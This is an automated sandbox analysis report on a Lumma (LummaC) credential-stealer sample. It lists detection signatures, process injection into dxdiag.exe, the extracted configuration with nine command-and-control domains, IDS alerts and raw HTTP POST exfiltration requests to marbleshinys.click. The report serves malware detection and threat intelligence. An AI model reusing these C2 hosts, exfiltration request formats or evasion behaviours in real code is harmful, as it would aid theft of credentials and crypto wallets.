Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PI1EA8P74K.exe

Overview

General Information

Sample name:PI1EA8P74K.exe
renamed because original name is a hash value
Original sample name:4de5ddc2a970f98efe99dc22c5b2de78.exe
Analysis ID:1582432
MD5:4de5ddc2a970f98efe99dc22c5b2de78
SHA1:2dec8ea0a05c5284f0db5573b3608b64bf94375d
SHA256:d24037cf570f9b0aa4337a9397eca861d2d3b0891b18a924c9ae6ad466a95de4
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • PI1EA8P74K.exe (PID: 7952 cmdline: "C:\Users\user\Desktop\PI1EA8P74K.exe" MD5: 4DE5DDC2A970F98EFE99DC22C5B2DE78)
    • dxdiag.exe (PID: 8016 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["shapestickyr.lat", "curverpluch.lat", "marbleshinys.click", "talkynicer.lat", "bashfulacid.lat", "wordyfindy.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat"], "Build id": "ZqchOa--new"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000003.1571272583.0000000003020000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1567861669.0000000003020000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000003.1570587188.0000000003020000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000003.1569901131.0000000003020000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 41 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T15:55:16.951297+010020283713Unknown Traffic192.168.2.1149756172.67.148.118443TCP
                2024-12-30T15:55:29.522357+010020283713Unknown Traffic192.168.2.1149837172.67.148.118443TCP
                2024-12-30T15:55:31.034523+010020283713Unknown Traffic192.168.2.1149845172.67.148.118443TCP
                2024-12-30T15:55:32.407597+010020283713Unknown Traffic192.168.2.1149858172.67.148.118443TCP
                2024-12-30T15:55:33.807369+010020283713Unknown Traffic192.168.2.1149869172.67.148.118443TCP
                2024-12-30T15:55:36.886737+010020283713Unknown Traffic192.168.2.1164243172.67.148.118443TCP
                2024-12-30T15:55:38.672375+010020283713Unknown Traffic192.168.2.1164254172.67.148.118443TCP
                2024-12-30T15:55:41.123431+010020283713Unknown Traffic192.168.2.1164270172.67.148.118443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T15:55:29.028116+010020546531A Network Trojan was detected192.168.2.1149756172.67.148.118443TCP
                2024-12-30T15:55:30.029059+010020546531A Network Trojan was detected192.168.2.1149837172.67.148.118443TCP
                2024-12-30T15:55:41.627242+010020546531A Network Trojan was detected192.168.2.1164270172.67.148.118443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T15:55:29.028116+010020498361A Network Trojan was detected192.168.2.1149756172.67.148.118443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T15:55:30.029059+010020498121A Network Trojan was detected192.168.2.1149837172.67.148.118443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T15:55:32.941576+010020480941Malware Command and Control Activity Detected192.168.2.1149858172.67.148.118443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["shapestickyr.lat", "curverpluch.lat", "marbleshinys.click", "talkynicer.lat", "bashfulacid.lat", "wordyfindy.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat"], "Build id": "ZqchOa--new"}
                Multi AV Scanner detection for submitted file
                Source: PI1EA8P74K.exeReversingLabs: Detection: 86%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Machine Learning detection for sample
                Source: PI1EA8P74K.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: marbleshinys.click
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ZqchOa--new
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49837 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49845 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49858 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49869 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64243 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64254 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64270 version: TLS 1.2
                Source: PI1EA8P74K.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:49837 -> 172.67.148.118:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49837 -> 172.67.148.118:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:64270 -> 172.67.148.118:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:49858 -> 172.67.148.118:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49756 -> 172.67.148.118:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49756 -> 172.67.148.118:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Malware configuration extractorURLs: marbleshinys.click
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49756 -> 172.67.148.118:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49837 -> 172.67.148.118:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49845 -> 172.67.148.118:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49869 -> 172.67.148.118:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49858 -> 172.67.148.118:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:64243 -> 172.67.148.118:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:64254 -> 172.67.148.118:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:64270 -> 172.67.148.118:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marbleshinys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: marbleshinys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ET1RU0B9LQR8S4C3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12833Host: marbleshinys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NZUOHX8B8FUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15015Host: marbleshinys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5YX4CKCOBDQTSL5TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20414Host: marbleshinys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=21MX5AWY95PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1174Host: marbleshinys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HBJCJS19A2ZIMWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586319Host: marbleshinys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: marbleshinys.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: marbleshinys.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marbleshinys.click
                Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: dxdiag.exe, 00000002.00000002.1643357377.0000000003031000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1571272583.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1567861669.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1570587188.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1570198116.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1569901131.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1566987811.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1576883133.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1578784333.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1583499340.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1566093282.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1569019682.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1566706853.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1567162517.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565979094.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1578277745.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1568656377.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1566813341.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft(4
                Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: dxdiag.exe, 00000002.00000003.1555074490.000000000542A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500
                Source: dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&cta
                Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: dxdiag.exe, 00000002.00000003.1555074490.000000000542A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: dxdiag.exe, 00000002.00000003.1555074490.000000000542A000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1609907561.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523098784.0000000002FC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/
                Source: dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/((
                Source: dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/3w
                Source: dxdiag.exe, 00000002.00000003.1523232930.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/7Q
                Source: dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/;v
                Source: dxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000003022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/Kv
                Source: dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/Sv=
                Source: dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1553804430.00000000054B9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1610114752.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603770541.000000000304E000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1609907561.000000000301F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/api
                Source: dxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/api8s
                Source: dxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000003022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/apiJr
                Source: dxdiag.exe, 00000002.00000003.1638321610.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643222941.0000000002FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/apiP
                Source: dxdiag.exe, 00000002.00000003.1565623403.000000000304E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/apiQ
                Source: dxdiag.exe, 00000002.00000002.1643999732.000000000304E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/apiv
                Source: dxdiag.exe, 00000002.00000003.1554662253.00000000054CD000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1552892573.00000000054CD000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1552078829.00000000054C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/jgES
                Source: dxdiag.exe, 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/kw5
                Source: dxdiag.exe, 00000002.00000003.1638835789.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640049211.0000000002FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click/pi
